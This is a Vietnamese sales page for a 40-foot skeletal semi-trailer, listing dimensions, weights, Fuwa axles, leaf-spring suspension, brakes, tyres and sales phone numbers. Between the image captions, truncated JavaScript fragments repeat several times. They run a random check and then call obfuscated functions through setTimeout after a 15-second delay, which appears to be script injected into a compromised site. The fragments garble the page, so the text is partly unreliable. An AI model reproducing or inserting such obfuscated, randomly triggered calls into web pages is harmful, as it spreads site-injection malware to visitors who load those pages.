SƠMI-ROMOOC XƯƠNG 40 FEET

xuong 40ftTHÔNG SỐ KỸ THUẬT

KÍCH THƯỚC

Kích thước tổng thểmm12440 mm x 2490mm x 1550 mm
Tự trọngkg6.100
Tổng tải trọngkg38.460
Dầm chínhmm500
Hệ thống treokgnhíp 8 lá
Trụckg3 x 13000Fuwa
Hệ thống phanh
Phanh hơi dây kép
Chân chốngkg28.000Fuwa
Vỏ 11.00-20Double coin

 

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}TONG THE 2

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET XUONG 11 andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET XUON 14 andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET XUON 12andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET 2


LIÊN HỆ ĐỂ ĐẶT HÀNG

SPhòng kinh doanh somi-romooc  TRƯƠNG THANH  (0650) 3786561

Mr. Thanh: (090) 82 80 555    /         Mr. Trưởng : (090) 811 22 50